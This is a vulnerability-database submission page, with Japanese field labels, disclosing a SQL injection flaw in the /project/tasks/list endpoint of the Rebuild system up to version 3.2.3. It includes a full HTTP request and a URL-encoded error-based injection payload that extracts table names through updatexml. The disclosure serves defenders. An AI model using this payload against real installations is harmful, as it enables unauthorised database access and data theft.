| タイトル | SQL injection vulnerability exists in the /project/tasks/list interface of the rebuild system |
|---|
| 説明 | Suggested description:
sql injection vulnerability exists in rebuild <=3.2.3
Failed to legally check parameters, resulting in SQL injection vulnerabilities.
Vulnerability Type:
SQLi
Vendor of Product:
https://github.com/getrebuild/rebuild
Affected Product Code Base:
<=3.2.3
Affected Component:
/project/tasks/list
Attack Type:
Remote
Request message:
```
POST /project/tasks/list?plan=051-0186e077f3840002&sort=&search=1&pageNo=1&pageSize=40&project=050-0186e077f3840001 HTTP/1.1
Host: 192.168.0.102:18080
Content-Length: 0
X-AuthToken:
Accept: */*
X-CsrfToken:
X-Requested-With: XMLHttpRequest
X-Client: RB/WEB
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Content-Type: text/plain;charset=utf-8
Origin: http://192.168.0.102:18080
Referer: http://192.168.0.102:18080/project/050-0186e077f3840001/tasks
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: _ga=GA1.1.113967341.1678976466; rb.TourEnd=session; GuideShowNaverTime=true; rb.sidebarCollapsed=false; JSESSIONID=CD3ABF26F95BD016C875973BC0F24154; _ga_CC8EXS9BLD=GS1.1.1679235290.8.1.1679235510.0.0.0
Connection: close
```
payload:
%25%5c%27%20or%20updatexml(1,concat(0x7e,(select+table_name+from+information_schema.tables+where+table_schema=0x72656275696c64+limit+0,1),0x7e),1)--+ |
|---|
| ソース | ⚠️ https://github.com/getrebuild/rebuild/issues/597 |
|---|
| ユーザー | Mechoy (UID 41579) |
|---|
| 送信 | 2023年03月19日 18:24 (3 年 ago) |
|---|
| モデレーション | 2023年03月23日 19:42 (4 days later) |
|---|
| ステータス | 承諾済み |
|---|
| VulDBエントリ | 223742 [Rebuild 迄 3.2.3 /project/tasks/list SQLインジェクション] |
|---|
| ポイント | 20 |
|---|